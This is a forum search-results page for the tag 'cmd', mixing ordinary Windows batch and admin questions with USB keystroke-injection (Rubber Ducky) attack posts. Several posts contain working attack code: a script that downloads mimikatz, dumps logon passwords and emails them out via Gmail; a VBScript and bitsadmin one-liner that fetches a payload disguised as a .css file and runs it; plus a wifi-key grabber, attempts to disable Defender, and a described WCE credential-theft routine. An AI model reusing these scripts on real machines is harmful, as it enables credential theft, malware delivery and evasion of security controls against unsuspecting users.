Search the Community
Showing results for tags 'cmd'.
Found 24 results
-
When I open a file for a game... There is some hidden one's that I can't see with the folder open. But through cmd there are things I can see in cmd but can't see in folders.
-
Im trying to exploit my rooted galaxy core prime which is vulnerable to the exploit/unix/x11/x11_keyboard_exec module. Im having a bit of trouble getting a shell. Ive got to the point where a session is created, but when i try to interact with the session to get a shelll it just stops and hangs and does nothing. Ive tried different payloads but the same thing happens everytime. It just says interacting with session <ID>, and I cant get any further than that. Any tips or help would be appreciated. And Im also a bit confused on configuring the reverse shell payload. is the LHOST supposed to be my IP or the victims in a reverse shell. plus what is the proper IP and port number for "ReverseListenerBindAddress" and "ReverseListenerBindPort? Thank you.
-
I am trying to stop service MsMpSvc but it dosen't seem to work. I have tried following : 1) net stop MsMpSvc 2) sc config MsMpSvc start= disabled It gives me following error : [SC] OpenService FAILED 5: Access is denied. And I do have admin privileges. -
Hello, I wanted to download files via CMD, and the first way I discovered was FTP. I rent a server and everything worked. The problem is that it takes kinda long to type in the credentials. After some research I found this PowerShell line: powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/file.exe','%TEMP%\file.exe') But I have some questions: What is the part after %TEMP% for? Is that the destination where the files "arrives"? So if i wanted to download it to C:\, I just have to change it to C:\, right? Where can I host the file for free? I found some web server hosting sites, but the only databases I was able to find were FTP and MySQL. Thank you for your help ;)
-
At first: Sorry for my bad English, I´m german and only 14 years old. I upload an .exe file from my computer to my FTP Server with the FTP.exe(cmd). Before I did that it was working just fine. But after I downloaded it, it comes up with the following error: "The file is not compatible with your computer." Before that, it came up with another error, something like "not compatible with a 64 Bit System. I accidently asked the question on StackOverflow 2 hours ago, and some people answered that I have to active binary mode. When I do that with the "binary" command, I get an answer that the activation was successful, but it isn´t working anyways. The .exe looks identical after download, but instead of having the old icon it shows up the standard .exe icon. I do not want to use another FTP program like FileZilla or ncftp (I tried it with FileZilla, it isn´t working either, so I don´t think, that FTP.exe is the problem here. The commands I used + Output(maybe the translation isn´t correct, but I think you know what the output meant): C:\WINDOWS\system32>ftp myftpserver.com Connection to icarus.bplaced.net established. 220 Welcome to myftpserver.com, FTP server standing by ... 504 Unknown command User (myftpserver.com:(none)): user 331 Hello user, your FTP account password is required: password: password 230-Login successful, your current directory is / 230 34349 Kbytes used (3%) - authorized: 1048576 Kb ftp> binary 200 TYPE is now 8-bit binary ftp> get example.exe 200 PORT command successful 150-Connecting to port 61051 150 347.5 kbytes to download 226-File successfully transferred 226 1.648 seconds (measured here), 210.83 Kbytes per second FTP: 355794 bytes received in 1.91 seconds 186.38KB/s ftp> Thanks and greetings, c0ntriX Edit: I´m owning a 64-Bit System.
-
I wanted to make a Rubber Ducky Script that uploads or downloads from my FTP Server. I came up with these commands: For downloading: ftp -i ftpserver.com *typing in username and pass* get file.exe (yes the files is in the root folder) The login worked fine. On my first FTP Server, I got the Error message " Error 500 Unable to service PORT commands" . After some research, I found out, that the ftp.exe does not support passive mode (no, the pasv command didn´t work). For whatever reason, i tried it on my other servers. So I´m typing everything in again, and then I get the message "200 Port command successful" and a few seconds after that "425 Could not open data connection to port 65086: Connection timed out" (no, the server wasn´t down). For uploading I used these commands: ftp -i ftpserver.com *typing in username and pass* lcd C:\Users\myname\Desktop put myfile.exe With this commands i get the same error as on Server 1 and 2. Can anyone help me? contrix_ ;)
-
Hi guys, I just got my rubber ducky and I'm having a little trouble using as I'm a newbie. I've been trying to use the Payload download mimikatz, grab passwords and email them via gmail but I get an error code when it comes to download mimikaz. (I know my emails and passwords lol) I've pasted the error and bin file content that I've been having trouble with. If someone could please help that would be awesome!!!! I also don't get how to install twin duck but I've just created this account so I'll check the forum to see if I find something but if someone would be kind enough to give me a step by step instruction and explanation that would be greatly appreciated. -------Error Message------- C:\WINDOWS\system32>powershell if ([System.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/i2ppl8v3xjeq8ju/mimikatz.exe?dl=0','%TEMP%\pw.exe'); }else{ (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/buorl25jw20ss8p/mimikatz.exe?dl=0','%TEMP%\pw.exe');} Exception calling "DownloadFile" with "2" argument(s): "The remote server returned an error: (460) status code 460." At line:1 char:200 + ... e'); }else{ (new-object System.Net.WebClient).DownloadFile('https://w ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : WebException -----------Bin content--------- DELAY 1000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y ENTER DELAY 300 REM -------------download appropriate mimikatz for architecture STRING powershell if ([System.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/i2ppl*****jeq8ju/mimikatz.exe?dl=0','%TEMP%\pw.exe'); }else{ (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/buorl25j*****8p/mimikatz.exe?dl=0','%TEMP%\pw.exe');} ENTER DELAY 5000 REM -------------get the passwords and save to c:\pwlog.txt STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt; ENTER DELAY 2000 STRING privilege::debug ENTER DELAY 1000 STRING sekurlsa::logonPasswords full ENTER DELAY 1000 STRING exit ENTER DELAY 300 STRING del %TEMP%\pw.exe ENTER DELAY 300 REM -------------email log via gmail STRING powershell ENTER DELAY 300 STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('******@gmail.com', 'MYPASSWORD'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = '*******@gmail.com' ENTER STRING $ReportEmail.To.Add('*******@gmail.com') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('c:\pwlog.txt') -
Hi all, I'm having a very odd issue with a batch file, simply designed to ping a machine and report it up or down. The script is as follows; ping -n 1 192.168.0.1 | find "TTL=" >nul if errorlevel 1 ( echo Host down. ) else ( echo Host up. ) The weirdness comes from the fact that, if I run the above as Admin, it works fine. However, if I just double click the batch file as a standard user, it returns; ^C^C^C^C^C^C^C^C^C^C^C^Cthe process tried to write to a nonexistent pipe^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C etc... The CTRL+C (^C) prompts come up over and over for a while, until CMD crashes out. I'm not pressing CTRL+C. I have no idea what's going on!
-
I'm attempting to create a FOR each user DO set a variable 'UserID' and then echo each User ID back. Why does this . . . FOR %%Z IN (SDESK1 SDESK2 SDESK3 SDESK4) DO (set UserID=%%Z echo %UserID%) . . . not set %UserID% correctly? It just echoes as '%Z' The output should technically just list each UserID one at a time; SDESK1 SDESK2 SDESK3 SDESK4 Sorry, it's been a while since I used FOR in batch and I'm sure I must be getting some syntax wrong! Cheers. -
Hey there, I'm quite new to using the rubber ducky and just wanted to ask a general question relating to a command that detects the connected wifi on a windows machine. For example, the code below: REM Windows Wifi Grabber DELAY 2000 GUI r DELAY 200 STRING cmd ENTER DELAY 200 STRING netsh wlan show profile name=RANDOMESSID key=clear ENTER Simply opens up cmd and types that command in. My question is if there is a cmd command that can replace "RANDOMESSID" with a command that automatically replaces that section with the connected wifi ESSID on the machine. Thanks!
-
Hi all, I'm looking to make a script, in either batch or Powershell, that will give a user access to a folder and all folders leading down to it. So, it would; Ask for input of Active Directory UserID Ask for input of a folder path List all of the security groups for the first folder in the path and allow selection of which one the AD UserID will be added to. List all of the security groups for the second folder in the path and allow selection of which one the AD UserID will be added to. List all of the security groups for the third folder in the path and allow selection of which one the AD UserID will be added to. etc. So, if user JBLOGGS wanted access to folder '\\Here\There\Everywhere', the script would; List the security groups for the folder '\\Here' and prompt for which AD group to add user JBLOGGS to. List the security groups for the folder '\\Here\There' and prompt for which AD group to add user JBLOGGS to. List the security groups for the folder '\\Here\There\Everywhere' and prompt for which AD group to add user JBLOGGS to. Note - The security groups for a folder are normally viewable in Windows by right clicking in a folder and going to 'Properties > Security > Group or user names' Hopefully this makes sense, if not please let me know. Please note that I understand the script for adding a user to an AD group, that's easy. The struggle is getting a script to prompt which security group for each level of the folder path the user should be added to. Thank you in advance.
-
Hi all, Here's a nice script, entirely in a batch file, that ; Prompts for input of a user's Full Name and Email Address Sets their password to a random string of uppercase, lowercase and numerical characters. Generates an email to send to them, with their new password. Notes; Length of the password can be set using the line Set _RNDLength= Whether user has to reset their password on logging in can be set with -mustchpwd Amend OU= and DC= for your own companie's domain. @echo off :Start endlocal echo. echo This script will reset the password for a user, using their Full Name, echo and then generate the email to be sent to them. echo. echo Passwords are automatically set as 10 digits, using lowercase, echo uppercase and numbers. echo. echo. echo. set /p "DisplayName= Full Name : %=%" echo. echo. set /p "EmailAddress= Email : %=%" cls Setlocal EnableDelayedExpansion Set _RNDLength=10 Set _Alphanumeric=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 Set _Str=%_Alphanumeric%987654321 :_LenLoop IF NOT "%_Str:~18%"=="" SET _Str=%_Str:~9%& SET /A _Len+=9& GOTO :_LenLoop SET _tmp=%_Str:~9,1% SET /A _Len=_Len+_tmp SET _count=0 SET _RndAlphaNum= :_loop SET /a _count+=1 SET _RND=%Random% SET /A _RND=_RND%%%_Len% SET _RndAlphaNum=!_RndAlphaNum!!_Alphanumeric:~%_RND%,1! If !_count! lss %_RNDLength% goto _loop dsmod user "CN=%DisplayName%,OU=[OU],DC=[DC],DC=co,DC=uk" -pwd !_RndAlphaNum! -mustchpwd no IF ERRORLEVEL 0 ( GOTO SendEmail ) ELSE ( echo. echo Failed. echo. Pause GOTO Start ) :SendEmail start "" "mailto:%EmailAddress%?subject=Password%%20Reset&body=Hello,%%0D%%0A%%0D%%0AYour%%20AD%%20password%%20has%%20been%%20reset%%20to%%20!_RndAlphaNum!%%0D%%0A%%0D%%0AKind Regards,%%0D%%0A%%0D%%0AYour%%20Name" cls GOTO Start Email generated looks like this; Hello, Your AD password has been reset to kD5Xjfd8A6 Kind Regards, Your Name This saves me some time at work when we get loads of emails asking for password resets for AD accounts. Takes 30 seconds instead of a few minutes.
-
So, this script downloads VB script via cmd and witch downloads payload.exe. To use this script you'll need some prep to do. First, sign up for a free website hosting (like eu.pn). You don't need to create any website, just to use that host for easy payload downloads. Rename VB script from .vbs to .css, also do the same for the payload from .exe to .css. WHY? Because you can't upload other file formats but html, css, js, and image formats and you need a full path link for this to work! And NO, you don't have to have admin rights for this to work! VB script: SaveWebBinary "http://yourfreesubdomain.eu.pn/payload.css", "C:\Users\Public\payload.exe" Function SaveWebBinary(strUrl, strFile) 'As Boolean Const adTypeBinary = 1 Const adSaveCreateOverWrite = 2 Const ForWriting = 2 Dim web, varByteArray, strData, strBuffer, lngCounter, ado On Error Resume Next 'Download the file with any available object Err.Clear Set web = Nothing Set web = CreateObject("WinHttp.WinHttpRequest.5.1") If web Is Nothing Then Set web = CreateObject("WinHttp.WinHttpRequest") If web Is Nothing Then Set web = CreateObject("MSXML2.ServerXMLHTTP") If web Is Nothing Then Set web = CreateObject("Microsoft.XMLHTTP") web.Open "GET", strURL, False web.Send If Err.Number <> 0 Then SaveWebBinary = False Set web = Nothing Exit Function End If If web.Status <> "200" Then SaveWebBinary = False Set web = Nothing Exit Function End If varByteArray = web.ResponseBody Set web = Nothing 'Now save the file with any available method On Error Resume Next Set ado = Nothing Set ado = CreateObject("ADODB.Stream") If ado Is Nothing Then Set fs = CreateObject("Scripting.FileSystemObject") Set ts = fs.OpenTextFile(strFile, ForWriting, True) strData = "" strBuffer = "" For lngCounter = 0 to UBound(varByteArray) ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) Next ts.Close Else ado.Type = adTypeBinary ado.Open ado.Write varByteArray ado.SaveToFile strFile, adSaveCreateOverWrite ado.Close End If SaveWebBinary = True End Function wscript.sleep 5000 CreateObject("WScript.Shell").Run "C:\Users\Public\payload.exe" Ducky script: GUI r DELAY 200 STRING cmd /C bitsadmin /transfer /download /priority foreground http://yourfreesubdomain.eu.pn/vb_script.css C:\Users\Public\dl.vbs && start C:\Users\Public\dl.vbs ENTER Happy hacking!
-
Hi all, I'm using... wmic /node:%Hostname% os get lastbootuptime ... which gives the output as a WMIDateTime (Last time a PC was rebooted)... 20160104102930 Is there a way for me to convert this output to a nicely formatted date/time from within the batch file? In this case, I'd like the output to be something like 04/01/2016 10:29 I've had a look around the net, but couldn't find what I needed. Surely batch can do this, without having to rely on Javascript/Powershell? Thank you.
-
Hi all, More batch script goodness. I'm using PSTools' psloggedon for this. In CMD, if I input 'psloggedon -l -x \\HOSTNAME' I get the following result... Connecting to Registry of \\HOSTNAME... Users logged on locally: DOMAIN\USER_ONE DOMAIN\USER_TWO DOMAIN\USER_THREE DOMAIN\USER_FOUR Using FOR in a batch script, I would expect skipping the first 2 populated lines (using /F) and setting the delimiter as '\' should allow me to pipe just the usernames to the screen, however it isn't working. I am using the following... @echo off for /f "skip=2 tokens=2 delims=\" %%a in ('psloggedon -l -x \\%Hostname%') do set "LoggedOnUsers=%%a" echo "%LoggedOnUsers%" ...which results in the variable %LoggedOnUsers% being echo'd as simply... USER_TWO The end result I am aiming for is to output a list of all usernames logged on to a Hostname, regardless of whether it's just 1 user or many users, and then offer a CHOICE to the user of which username they want to select. For example, if a machine had 4 users logged on to it, the return would be; A. USER_ONE B. USER_TWO C. USER_THREE D. USER_FOUR Select a user : A,B,C,D [set variable based on whether input is A, B, C or D to the username for that selection] Where am I going wrong? Thank you. *edit* Amended spelling.
-
Hello all, Sorry to ask another CMD/Batch question, I'm still learning and having way too much fun ;) I'm trying to add a printer using... rundll32.exe printui.dll,PrintUIEntry /in /n "\\servername\Printer Name" ... which works great IF you know the full name of the printer you are trying to add. If I use Windows 7's Control Panel > Devices & Printers to add a printer, I can select; Add A Printer > Add A Network Printer > The Printer I Want Isn't Listed > Find a printer in the directory and then type in a small section of the printer's name and it will find it. For example, one of our printers is called 'Q123 HP LJ MFP M880 on SERVERNAME' but I can find it by simply typing in Q123. Is there a way that I can get the batch command to add the printer using something like... rundll32.exe printui.dll,PrintUIEntry /in /n "Q123" ... and get the system to do the same kind of search it would do if I went through the control panel (automatically search our print server for a name like 'Q123' and install it?) I have trawled the internet for a while looking for this info, but was unsuccessful in finding anything that didn't state to input the full name of the printer. Thank you in advance. *edit* Amended grammar/spelling.
-
Hi all, I'm using PSEXEC to map a drive on a user's machine remotely, amongst running various other CMD commands to amend registry files etc. I am running PSTOOLS on my machine under an admin account, because I cannot use PSTOOLS otherwise. On running the following script, as an example of one of the CMD commands I am trying to run, it runs it as me (as in, an admin). However, I don't want it to do this, as this doesn't map the drive for the user. I want the script to run the CMD command as the currently logged on user, not as me. :MapDrive psexec \\%IP% -s -i -c -f -d cmd.exe /s /c "NET USE X: \\GBUS0042\SMSAPPS$ /persistent:yes" IF ERRORLEVEL 0 ECHO Success! Pause endlocal GOTO Start How would I go about this? I have tried calling a batch file instead, but it still runs the batch file as me (admin) on the user's PC, rather than as them. The idea behind these scripts is to stop me having to remote to every user who simply requires a registy amendment or a drive mapping. Thank you in advance, Haze
-
Hi all, I am using the following CMD command; reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Personal /t REG_SZ /d P:\ /f However, this doesn't work. The key already exists, as as 'M:\', but I need it to change to 'P:\'. The CMD prompt states 'The operation completed successfully', but the key does not change. I need to do this via CMD, rather than a .reg or regedit. Thank you.
-
I'm trying to schedule a startup application with schtasks on a Windows 7 box. I get Access Denied. schtasks works without administrator privileges if you are setting it for specfic time of day but not with startup tasks. Is there a tricksy way to schedule startup tasks on Windows 7 and later without being admin?
-
Hello all, I have generated a simple payload from ducktoolkit that creates a reverse shell. When trying to use the payload, in the cmd window I get the error that ymode is not a recognized command and I believe this is causing the entire script/payload to not work. What can I do to fix this problem? Any help is much appreciated. -
This payload will create a batch file with looks like a matrix and then will execute it. DELAY 3000 GUI R DELAY 500 STRING notepad ENTER DELAY 1000 STRING @ echo off ENTER STRING color 0a ENTER STRING :start ENTER STRING echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% ENTER STRING goto start ENTER CTRL-S DELAY 500 STRING matrix.bat ENTER ALT-F4 DELAY 500 GUI R DELAY 500 STRING matrix.bat ENTER
-
Ello everyone, I am very new with the ducky, and I am looking for some help. As I understand, powershell must be installed for any of the "Duck Toolkit" payloads to work. I was interested in DNS poisioning, but I cant get it to work correctly. I even tried to remove the command prompt section and have an administrative cmd already up and running before I plugged in my ducky. Everything went smoothly, but it still did nothing. I have disabled all my anti-virus programs and even tried a few random other DNS poisioning/host mod scripts that I randomly found on here and other websites. No luck. Is there a way to: 1. copy "hosts.txt" (pre-created file) from my single ducky sd card to the \Windows\System32\drivers\etc folder 2. delete "hosts" file in \Windows\System32\drivers\etc folder 3. rename "hosts.txt" to just "hosts" Please, no powershell. It seems pretty simple, but I still have no idea what I am doing.
-
Hello all, This is just a small bit of logic to pull the architecture type from the machine and based on that, perform different functionality calls IE: for Mimikatz using both the 32 / 64 bit versions or with procdump specifying -64 for 64 bit machines or not... etc. STRING wmic computersystem get SystemType | find "x64" >nul&& (set "SystemType=64bit") || (set "SystemType=32bit") Anyhow, you'd put in logic after this which would run your different executable based on the %SystemType% var I'll write up a full demo script in a bit for those of you wanting an example. Thank you. Enjoy!
-
Hi Folks, I wanted to share a new script I developed that shows a proof of concept for a rubber ducky and Windows Credential Editor (WCE) script that would would do the following: 1.) Disable Antivirus for 15 minutes which is default. (This must be done to avoid signiture detection of WCE executable) 2.) FTP to attacker machine on the network, downloading the 32-bit & 64-bit version of WCE 3.) Script then executes both versions, sending the output to a text file with the computer name as the variable of the file name. Note: One executable will fail (64 or 32 bit), but it will not write to the output file. 4.) Script will then upload the file containing cleartext passwords for users logged in based on LSASS memory 5.) The script will then remove all WCE executables as well the cleartext password file created before the antivirus program automatically start. Then closes all appropriate windows The video demo can be found at: http://youtu.be/IqUci4buvvM Below is a copy of the script. Note: This is a proof of concept and will need to be tweaked per environment and penetration testing engagement. ---------------------------------------------------------------------------------------------------------------------------------------------- code below: ------------------------------------------------------------------------------------------------------------------------
